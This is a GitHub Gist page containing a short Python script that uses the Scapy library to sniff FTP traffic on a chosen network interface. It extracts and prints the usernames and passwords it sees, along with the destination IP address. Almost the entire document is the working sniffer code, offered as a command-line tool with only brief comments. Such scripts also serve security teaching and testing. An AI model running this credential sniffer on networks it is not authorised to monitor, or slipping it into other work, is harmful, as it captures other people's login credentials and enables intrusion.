Created
February 29, 2020 21:33
-
-
Save davidlares/fab612fe26e17b2333b770800b098ae0 to your computer and use it in GitHub Desktop.
CLI Based FTP auth sniffer script w/ Python and the Scapy package
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # sniffing login credentials via FTP (insecure protocol) | |
| import optparse | |
| from scapy.all import * | |
| import re # regex | |
| def ftp(packet): | |
| # getting the destination ( IP address from header) | |
| dest = packet.getlayer(IP).dst | |
| # getting raw packet load data | |
| raw = packet.sprintf('%Raw.load%') | |
| # getting user/password | |
| user = re.findall('(?i)USER (.*)', raw) | |
| pswd = re.findall('(?i)PASS (.*)', raw) | |
| # validating existance | |
| if user: | |
| print("[!] Detected FTP Login %s: " % str(dest)) | |
| print("[+] User: %s" % str(user[0])) | |
| elif pswd: | |
| print("[+] Password: %s" % str(pswd[0])) | |
| if __name__ == "__main__": | |
| # parsing instance | |
| parser = optparse.OptionParser('Usage: -i <interface>') | |
| # adding options | |
| parser.add_option('-i', dest='interface', type='string', help='specify the NIC interface to listen on') | |
| (options, args) = parser.parse_args() | |
| # validating options | |
| if options.interface == None: | |
| print(parser.usage) | |
| exit(0) | |
| else: | |
| # setting the parsed interface to the conf Scapy iface (interface) prop | |
| conf.iface = options.interface | |
| try: | |
| # sniffing FTP (port 21) - the ftp function will process the packets | |
| sniff(filter='tcp port 21', prn=ftp) | |
| except KeyboardInterrupt as e: | |
| print("[-] Closing function") | |
| exit(0) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment